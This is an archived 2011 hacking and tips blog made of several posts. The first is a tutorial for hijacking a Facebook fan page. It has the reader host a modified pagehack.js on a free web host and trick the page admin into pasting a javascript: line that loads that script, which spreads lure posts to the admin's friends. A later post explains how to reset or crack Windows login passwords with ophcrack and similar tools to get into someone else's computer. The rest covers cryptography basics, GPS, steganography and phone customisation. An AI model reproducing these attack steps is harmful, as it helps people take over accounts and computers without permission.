Wednesday, August 31, 2011

Hacking facebook fan page

Today I will show you how to hack a Facebook fan page. I hope you like this tutorial and give your feed back in the comments.

Now lets start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then its great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

1. Download the exploit from this Link
http://www.4shared.com/document/HtqztIVz/pagehack_2.html

2. After downloading it, you need to edit the it. Get notepad++, one of my hot favorite editor. You can download it from here.
http://notepad-plus-plus.org/download/v5.9.3.html

3. Open the file named pagehack.js with notepad++. Now find the text rjcrystal@rocketmail.com by pressing ctrl+f and replace it with your own email id which you have used while signing up for facebook.

4. Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15. Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js)

5. Now you have to upload this script to your server. For this make an account at http://0fees.net/ or 000webhost.com (t35 or 110mb won’t help this time) and use filezilla and upload this to your root.means connect your filezilla with the given details on your email. So the address where your script is uploaded will be as follows:

www.yoursite.0fees.net/booster.js

6. Now comes the most important part of this Hack. You need to convince the admin of that Fan page to put the following code (Note: Don’t forget to replace the text in bold with the address of your script) in his browser’s address bar and hit enter while he is on Facebook.

" javascript:(a = (b = document).createElement(“script”)).src = “//www.yoursite.0fess.net/booster.js“, b.body.appendChild(a); void(0)"

Tip: You can fool him by making him greedy to grab something.

sorry guys there was a mistake in web host name typing i have changed it to http://0fees.net/

Sunday, August 28, 2011

Cryptography

Cryptography is an art of writing text or data in secret code
It encrypts the plain text data into unreadable format, which is
called as cipher text
It is based on mathematical algorithms
These algorithms use a secret key for the secure
transformation
In cryptography, each person receives a pair of keys, called the public-key, and the
private-key
Each person’s public-key is published while the private-key is kept secret
Anyone can send a confidential message using public information, but it can only be
decrypted with a private-key that is in the sole possession of the intended recipient
Classical ciphers comprise of two basic components:
• Substitution Cipher
• Transposition Cipher
• Monoalphabetic
• Polyalphabetic
Several of these ciphers are grouped together to form a ‘product
cipher'

Encryption

Encryption is the process of converting data into a secret code
It is the most effective way to achieve data security

To read an encrypted file, you must have access to a secret key or password that enables
you to decrypt it
Unencrypted data is called plain text

Encrypted data is referred to as cipher text

DATA
(‘Morpheus’)
Encrypted DATA
(‘3*.,~’@!w9”)

Decryption
Decryption is the process of decoding data that has been encrypted into a secret
format
It requires a secret key or password
Public Key Cryptography encryption
Decryption is performed with public
and private keys

Cryptographic Algorithms

Secret key Cryptography:
• It uses a single key for both encryption and decryption processes
• Since single key is used for both encryption and decryption , it is also called as Symmetric Encryption

Public key Cryptography:
• It uses one key for encryption and another for decryption
• One key is designated as a public key which is open to public and the other key is designated as a private key which is kept secret

Hash Functions:
• It uses a mathematical transformation to irreversibly "encrypt" information
• It is also called ‘Message Digest’ and One-way Encryption, are algorithms that, in
some sense, use no key
• Instead, a fixed-length hash value is computed based upon the plaintext
• Hash algorithms are typically used to provide a digital fingerprint of a file's contents

# RSA (Rivest Shamir Adleman)

RSA is a public-key cryptosystem

It uses modular arithmetic, and
elementary number theories to
perform computations using two
large prime numbers

RSA encryption is widely used and is
the de-facto encryption standard

Data Encryption Standard (DES)

DES is an algorithm for encrypting and
decrypting unclassified data
It is a block cipher that takes a plaintext
string as input and creates a ciphertext string
of the same length

It uses a symmetric key, which means that
the same key is used to convert ciphertext
back into plaintext

The DES’s block size is 64 bits
The key size is also 64 bits, although 8 bits of
the key are used for parity (error detection)
which makes the effective DES’s key size 56 bits


Rc4 Is a variable key size stream cipher with byte-oriented
operations, and is based on the use of a random
permutation

Rc5 Is a parameterized algorithm with a variable block size,
key size, and a variable number of rounds
RC6 adds two features to RC5: the inclusion of integer
multiplication, and the use of four 4-bit working
registers instead of RC5’s two 2-bit registers

Blowfish Is a 64-bit block cipher that uses a key length that can
vary between 32 and 448 bits

SSL (Secure Sockets Layer)
SSL stands for Secure Sockets Layer
It is a protocol developed by Netscape
for transmitting private documents via
the Internet

It works by using a private-key to
encrypt data which is transferred over
the SSL connection

SSL Protocol is an independent
application protocol

Algorithms and Security
40-bit key algorithms are of no use

56-bit key algorithms offer privacy, but are
vulnerable

64-bit key algorithms are safe today but will be
soon threatened as the technology evolves

128-bit and over algorithms are almost unbreakable

256-bit and above are impossible

Digital Signature

Digital Signature is a type of asymmetric cryptography used
to simulate the security properties of a signature in digital,
rather than written form
Digital signature schemes normally give two algorithms;
one for signing which involves the user's secret or private
key, and one for verifying signatures which involves the
user's public key
The output of the signature process is called the "digital signature'

Components of a Digital Signature
Components of Digital Signature:
Public key
Name and E-mail of sender
Key expiry date
Company name that sends the
information
Serial number of Digital Signature
Digital signature of certification authority

Digital Signature Applications
Digital Signatures are used to check:
Identity of the sender

Dependability of the message

Whether message sent is genuine

For risk of frauds

Whether message is illegally reproduced

Fulfillment of lawful requirements

For security of open systems
Digital Certificates

Digital Certificates verify the uniqueness of the principles and entities over
networks as electronic documents
Unique identity to the owner of the digital certificate is defined by both public key
and private keys
Widely accepted format for digital certificates is defined by the ITU-T X.509
international standard
Digital certificate includes a variety of information such as:
• Name of the subject
• Subject's public key
• Certification authority’s name
• Serial number
• Lifetime period of the digital certificate right from the start date

PGP (Pretty Good Privacy)

Pretty Good Privacy (PGP) is a software package originally developed by Philip R.
Zimmermann, which provides cryptographic routines for email, and file storage applications

Zimmermann took existing cryptosystems and cryptographic protocols, and developed a program that can run on multiple platforms
It provides message encryption, digital signatures, data compression, and email compatibility

Hacking Tool: PGP Crack

PGP crack is a program designed to brute force a conventionally
encrypted file with a PGP, or a PGP secret key

The file pgpfile cannot be ascii-armored
The file phraselist should be a file containing all of the passphrases that
will be used to crack the encrypted file

CypherCalc
CypherCalc is a full-featured, programmable calculator designed for
multi-precision integer arithmetic

It is intended for use in the design,
testing, and analysis of cryptographic
algorithms involving key exchanges,
modular exponentiation, modular
inverses, and Montgomery Math

It has built-in GCD and SHA 1 tools, and
a CRC tool that can generate CRC tables
for your applications
Advanced File Encryptor
Advanced File Encryptor is a tool to encrypt and
secure most important files like banking
information, e-mail documents, and any other file
with special personal value
This program uses unbreakable 256-bit AES
encryption and provides a peace of mind that data is
safe
It can also create self-decrypting archive files that
require a password when opened and will extract the
protected documents
It allows to encrypt typed text or clipboard content
using AES, Twofish, or RSA encryption, which
allows you to protect email or chat conversations as
well

Encrypt PDF
Encrypt PDF software allows to encrypt (using standard 40-bit or
8 128-bit supported by Acrobat Reader 7.0 and up) existing PDFs, set
permissions, add user, and owner password
Button to print the file will be disabled in Acrobat Reader application,
it can encrypt a PDF allowing the user to read it only if he knows the
correct password
Two passwords can be applied to the PDF: they are owner and user
password

Code Breaking: Methodologies
The various methodologies used for code breaking are:
• Using brute-force
• Frequency analysis
• Trickery and deceit
• One-time pad

Saturday, August 27, 2011

All about GPS

The Global Positioning System (GPS) is a satellitebased
navigation system that provides reliable
positioning, navigation, and timing services

GPS shows the exact position on earth

GPS is a constellation of 24 satellites revolving
11,000 nautical miles above earth surface

A GPS receiver can detect signals transmitted by GPS sattelites

Terminologies
Differential GPS (DGPS)
• DGPS is a method of improving the accuracy of your receiver by
adding a local reference station to expand the information
available from the satellites

Wide Area Augmentation System (WAAS)
• WAAS is intended to enable aircraft to rely on GPS for all phases
of flight, including precision approaches to any airport within its
coverage area
• It transmits signals containing information on reliability and
European Geostationary Navigation Overlay
Service (EGNOS)accuracy of the positioning signals which are sent by GPS and Global Orbiting Navigation Satellite system(GLONASS)

Local Area Augmentation System ( LAAS)
• Corrected data are transmitted from a local source, typically an
airport or another location where accurate positioning is needed
• These correction data are typically useful for only about a thirty to
fifty kilometer radius around the transmitter

Geometric Dilution of Precision (GDOP)
• The effects of the combined errors of four variables (latitude,
longitude, altitude, and time) on the accuracy of a threedimensional
fix
• The ratio of incoming signal strength to the amount of interfering
Signal to Noise Ratio (SNR)
noise as measured in decibels on a logarithmic scale.

# Gpsd-GPS Service Daemon
gpsd is a service daemon that monitors one or more GPSs attached to a
host computer through serial or USB ports
It makes all data on the location/course/velocity of the sensors,
available to be queried on TCP port 2947 of the host computer
With gpsd, multiple GPS client applications (such as navigational and
wardriving software) can share access to GPSs without contention or
loss of data
# Waypionts
A waypoint is a spot on the surface of the Earth as defined by
coordinates that are inputted into the GPS and stored, usually along
with an icon, a descriptive name, and some text

Websites where waypoints can be stored:
• www.waypoint.org
• www.swopnet.com/waypoints
• www travelbygps.com
• www.pickatrail.com

#Wardriving
Wardriving is an activity by which WiFi
networks, broadcasting signals are
detected

With addition of GPS, pinpoint location
of the discovered hotspot can be stored

Information regarding street names,
building numbers, network spots, and
logs by location are stored automatically

#Sources of GPS Signal Errors

Factors which reduce quality of GPS signal are:
1.Ionosphere and troposphere delays
2.Signal multipath
3.Receiver clock errors
4.Orbital errors
5.Number of satellites visible
6.Satellite geometry/shading
7.Intentional degradation of the satellite signal

Ethical hacking

i have recently got the big source of hacking guide that i will post it here so keep waiting

Wednesday, August 24, 2011

Stegenography!!!

Have you ever wonderd that how to hide txt
(data) files in an image,mp3,pdf,txt in this post i will show you how to do this there are two softwares to do this
1) WB stego
steps:
1.Press continue and proceeed further
2. Encode or Decode this will be your first time so select data to encode (to hide any file) (only for this software)
3.Select carrier file in which you want to hide your file you can also search for a carrier file the
NOTE: the carrier file should have enough space to store data file (secured PDF will not work)
4.Select type of encryption and password by going in cryptography settings.
5.Select name and destination of manipulated file (check distribute data evenly)
6.Press continue to begin the encoding process and you are done
to get the encoded file back select decode in 2nd step and write password and get the file.>>

2)Mp3stego
MP3Stego will hide information in MP3 files during the compression process. The data is first compressed, encrypted and then data hidden in the MP3 bit stream.
Although MP3Stego has been written with steganographic applications in mind it might be used as a watermarking system for MP3 files. it comes with a simple user interface
1.open it u will see encode text to mp3 and decode text from mp3 select the one you wanted
2.Copy the mp3 and text files to the current directory of mp3steno then select the files and press encode
3.To decode select decode text from mp3 then enter file and decode it and the password is secured.

Mp3stego download link http://www.4shared.com/file/FF9MmGm4/MP3Stego_GUI.html
WB stego download link
http://www.4shared.com/file/_NBD1lAY/wbs43open-win32.html

Sunday, August 21, 2011

Changing look of your Symbian S60 phone other mobile OS

Have you ever wonderd that how it would be if you were able to use ios in your nokia S60 v5 phone ??? or windows 7 or an android in this post i will tell you how to do this
first and foremost dowload and install flash lite 3 on your phone(some phones have preinstalled )
this thing is based on changing of shell of symbian to the corresponding OS
1)Using windows 7 in your symbian phone

#The easiest way to own Win7 on your phone. The best Win7 style launcher on Symbian.

Features:
1. Direct access to the target apps with the navigation key via Start menu.
2. At the time you operate in any apps, Win7 remains active.
3. Fresh, friendly, and familiar appearance.
4. 6 different wallpapers being selected. Dress your screen as simple as you do on PC.
5. Analogue clock and calendar at sidebar.

Ps:
1. You can assign one of your Right key, Left key or additional function key related to this app, this will help you one press to start the app.
2. The app is using flash lite to launch phone's app, so it will go back to s60's app user interface with system's limitation when using a particular app.

Old models as Nokia E50, E60, E61, E62, E65, E70, N71, N72, N73, N75, N80, N91, N92, N93 need to update to flash lite 2.1 player or higher: Adobe mobile center

After installed the file to your phone, there will be a icon on your phone's Installed. folder. (its for my phone u need to seclect your own phoneand u also need to do a short sign up)

2)For google android
# M1, the all new launcher from MMMOOO, running with Android™ UI shell on Symbian phones. It's the first & best Android™ UI shell in Symbian apps.

Features:
Fully emulates Android™ UI
Quick launcher to S60 Nokia Samsung apps
Weather Widget NEW!
Call and SMS notifier (S60 5th phones only) NEW!
Add, Rearrange & Delete every icons on the home screen for S60 5th models; Add & Delete every icons on the home screen for S60 3rd models
Support touch screen
Key lock
Registration module inside: Ensure M1 owner enjoy dedicated MMMOOO Premium Service with distinguish & guarantee.

Infos to know:
1. If you use this application all the time, it consumes more battery.
2. This application cannot replace the original functions of S60, eg, when opening a SMS, you will go back to original S60 UI.
3. M1 will keep updating in timeline, plz notice our blog for further information.

Trial Limition:
Can not move icons to the home screen.

After installed the file to your phone, there will be a icon on your phone's Installat. folder.

Old models as Nokia E50, E60, E61, E62, E65, E70, N71, N72, N73, N75, N80, N91, N92, N93 need to update to flash lite 2.1 player or higher: Adobe mobile center
3) For ios (apple) the company mmmooo has given name my phone 4 to this ui shell

# The BEST pal for your S60 phones. MyPhone 4 and MyPhone theme Infinite Edition. Turn your S60 phones totally to MyPhone UI.

MyPhone powered by S60 os, it turns S60 os phone into MyPhone UI. You can have a smart phone enhanced with TWO user interfaces. The best launcher ever!

MyPhone 4 enhances your phone as a flexible & strong platform to play game and access internet, combining 4 popluar OS UI on your Nokia.
Features:

Fully emulate MyPhone UI in out look, move icons, changes icons
Slide to unlock.
Calendar list.
Translation.*
Archery Game.
SMS and Call notifier
iStyle SMS conversation, you can schedule the SMS with senders list, easily to read or delete SMS. (only for S60 5th os)
Add 3rd part icon by pick through list, no needing self input anymore. (only for S60 5th os) (Java application cannot launched)
Memo Deduction embedded.
Memo Mosaic embedded.(only for S60 3rd os)
Speed Dial.
Sketchpad (only for S60 5th os)
Alternative List Mode (only for S60 5th os)
Auto-lock (only for S60 5th os)
Set lock screen on/off by yourself.
Support Landscape mode for iStyle SMS. (N97 & N97 mini only)
Worldwide Weather
RSS Reader, with seamlessly reading data method
Fully functional, all operations can be done via MyPhone
You can switch MyPhone UI into S60 UI and the other way round seamlessly.

1. M1 UI.

2. iConsole UI.

3. iXP UI.

4.WIN7 UI.

4) For windows xp shell
#Go on your PC desktop on phone! iXP simplize & virtualize S60 UI with most familiar XP style menu. Best Windows style launcher ever in Symbian.

Features:
1. Direct access to the target apps with the navigation key via Start menu.
2. At the time you operate in any apps, iXP remains active.
3. Fresh, friendly, and familiar appearance.
4. 6 different wallpapers being selected. Dress your screen as simple as you do in PC.
5. Any operations can be done through iXP.

PS: Trial files is limited to 3 times with full functions.

How to use:
1. Down and up the Navigatin key to select from different icons.
2. Press left key to enter Start menu, then again the navigation key rules.
3. Select More to open a My Computer like folder with 5 frequent used items in.
4. Enter Start menu, select Quit and confirm for normal quit.

Ps:
same as windows 7 thing

5)iconsole

#Emulate the most popular game console's UI! Now you can launch the apps with this start up menu.
Features:

Weather widget, Fitness pal(5th os only), Bookmark in icon...and embedded free & premium MMMOOO products at Ovi.
Tip:

You can add or delete icons as own preference for 3rd part apps, web bookmarks.

website

http://shop.immmooo.com/

then seclect your phone and then goto app and then launcher interface

(its for my phone u need to seclect your own phoneand u also need to do a short sign up)

How to install?
When installing to S60 3rd phones, you may have to revise as this: tools - App.mgr.- optional- settings:software installation(all),online certif.check(off). This will help you to solve and skip the "security warning" pop-up.
Our APP is a passive content,it's safty and security. And it has been proved and tested by sample phones.

Sunday, August 14, 2011

How To Hack File Hosting Services


In this post I’ll show you how to use firefox add-on SkipScren to hack file hosting services asmegaupload, rapidshare, hotfile etc. You can easily skips the clicking and waiting.
SkipScreen works great on these sites:
* Rapidshare (don’t click! it’s automatic!)
* Megaupload (captcha action coming soon!)
* Mediafire
* Uploaded.to
* zShare (now with a “listen-first” option!)
* Sharebee
* DepositFiles
* Sendspace
* Divshare
* Linkbucks
* Link-protector
1) Downlaod SkipScreen 
2) Install it on your computer and restart firefox
3) when you visit any of file hosting website don’t click! it’s automatic , SkipScreen will download your file automatically when it’s available.It looks like this
[blip.tv http://blip.tv/play/AfW%2BNgI]

Change the Logon Screen Background in Windows 7


How would you like to change the logon screen background in Windows 7 so as to give your Windows a customized look and feel? With a small tweak it is possible to customize the Windows 7 logon screen and set your own picture/wallpaper as the background. Changing logon screen background in Windows 7 is as simple as changing your desktop wallpaper. Well here is a step by step instruction to customize the logon screen background.
 
1. The image you need to set as the background should be a .jpg file and it’s size should not exceed 245KB.
2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image asbackgroundDefault.jpg.
3. You will need to copy this image to
C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.
4. Now open the Registry Editor (Start -> Run -> Type regedit) and navigate to the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\
LogonUI\Background
If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.
5. Double-click on OEMBackground and set the Value Data to 1.
6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.
I hope you like this trick. Just try out and give your feedback!

Friday, August 12, 2011

Create Your Own Customized Run Commands


The Run command on Microsoft Windows operating system allows you to directly open an application or document with just a single command instead of navigating to it’s location and double-clicking the executable icon. However, it only works for some of the inbuilt Windows programs such as Command prompt (cmd), Calculator (calc) etc. So, have you ever wondered how to create your own customized Run commands for accessing your favorite programs, files and folders? Well, read on to find out the answer.

Creating the Customized Run Command

 
Let me take up an example of how to create a customized run command for opening the Internet explorer. Once you create this command, you should be able to open the Internet explorer just by typing “ie” (without quotes) in the Run dialog box. Here is how you can do that.
1. Right click on your Desktop and select New -> Shortcut.
2. You will see a “Create Shortcut” Dialog box as shown below
Create Shortcut
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
3. Click on “Browse”, navigate to: Program Files -> Internet Explorer from your Root drive (usually C:\) and select “iexplore” as shown in the above figure and click on “OK”.
4. Now click on “Next” and type any name for your shortcut. You can choose any name as per your choice; this will be your customized “Run command”. In this case I name my shortcut as “ie”. Click on “Finish”.
5. You will see a shortcut named “ie” on your desktop. All you need to do is just copy this shortcut and paste it in your Windows folder (usually “C:/Windows”). Once you have copied the shortcut onto your Windows folder, you can delete the one on your Desktop.
6. That’s it! From now on, just open the Run dialog box, type ie and hit Enter to open the Internet Explorer.
In this way you can create customized Run commands for any program of your choice. Say “ff” for Firefox, “ym” for Yahoo messenger, “wmp” for Windows media player and so on.
To do this, when you click on “Browse” in the Step-3, just select the target program’s main executable (.exe) file which will usually be located in the C:\Program Files folder. Give a simple and short name for this shortcut as per your choice and copy the shortcut file onto the Windows folder as usual. Now just type this short name in the Run dialog box to open the program.
I hope you like this post! Pass your comments.

Tuesday, August 9, 2011

Know More About Secure Sockets Layer (SSL)


Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.
 

What exactly is Secure Communication ?

 
Suppose there exists two communication parties A (client) and B (server).
 
Working of HTTP
When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between Aand B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
 
Now lets see the working of HTTPS
When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below
 

How is HTTPS implemented ?

 
HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
  1. An SSL Certificate enables encryption of sensitive information during online transactions.

  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.

  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.

 
How Encryption Works ?
Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
 
How to identify a Secure Connection ?
In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login page

Sunday, August 7, 2011

Forgot windows login password or want to crack some one's password


This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Windows 7)  at times when you forget it or when you want to gain access to a computer for which you do not know the password.
Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called  Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.
  • You do not need to know the old password to set a new one
  • Will detect and offer to unlock locked or disabled out user accounts!
  • There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.
The download link for both CD and floppy drives along with the complete instructions is given below
It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.

Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.
1. Open the command prompt (Start->Run->type cmd->Enter)
2. Now type net user and hit Enter
3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows
4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.
So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.
Besides this two methods you can also crack password using a simple technique follow this steps 
when you see windows login screen just press Alt+Ctrl+delete two times and then you will see basic login screen and type "administrator" and then enter you can access the system and then change the password using command but this works in some windows systems only
Other way you can also do it by software called ophcrack for this download ophcrack from here based on your operating system then boot your system and boot using ophrack linux (insert ophcrack CD and then reboot then it will ask boot from CD press any key to start ophcrack) then seclect graphic mode and then a dialog box will appear like this. then the password will be shown in the box with respective user name 

 WHAT IS OPHCRACK???
Ophcrack is a free open source (GPL licensed) program that cracks Windows passwords by using LM hashes through rainbow tables. The program includes the ability to import the hashes from a variety of formats, including dumping directly from the SAM files of Windows. On most computers, ophcrack can crack most passwords within a few minutes.
Rainbow tables for LM hashes of alphanumeric passwords are provided for free by the developers. By default, ophcrack is bundled with tables that allows it to crack passwords no longer than 14 characters using only alphanumeric characters. Available for freely for download are two Windows XP tables, one small and one fast, and one Windows Vista table.
Objectif Sécurité has even larger tables for purchase, intended for professional use. Larger rainbow tables contain LM hashes of passwords with all printable characters, including symbols and spaces, and are available for purchase.
Ophcrack is also available as Live CD distributions which automate the retrieval, decryption, and cracking of passwords from a Windows system. One Live CD distribution is available for Windows XP and lower, as well as another for Windows Vista and Windows 7. The Live CD distributions of ophcrack are built with SliTaz GNU/Linux.
Starting with version 2.3, Ophcrack also cracks NTLM hashes. This is necessary if the generation of the LM hash is disabled (this is default for Windows Vista), or if the password is longer than 14 characters (in which case the LM hash is not stored).

Monday, August 1, 2011

adding orange home screen in your nokia S40 device

first download this file variant defaults file  download oxycube and goto to this location  c:/hiddenfolder/isasettings/varaintdefaults 
then replace the original file and then copy the file given in the download and disconnect and reboot ur phone that's all now goto settings/display/homescreen or orange home screen(in non home screen supported phones like nokia 5130) 
 install and open PPMod and select your ppm file
- click under ppm
- then click under text
- click on edit contents at bottom right
- when a new TEXT screen pops up (looks like a grid / excel doc with all the rows and columns), scroll down through the entries and locate Orange Homescreen.
- for the next 200 entries below (some are blanks, while some are filled), simply enter the fields following the same pattern as in the text file attached below.
- when you have finished, simply close the text edit window and click on 'create ppm' button.
- Done!
- you can then flash your phone with the edited ppm. 

OHS entries http://www.4shared.com/document/A7vM0_VX/Orange_HS_Entries_.html

Twitter Delicious Facebook Digg Stumbleupon Favorites More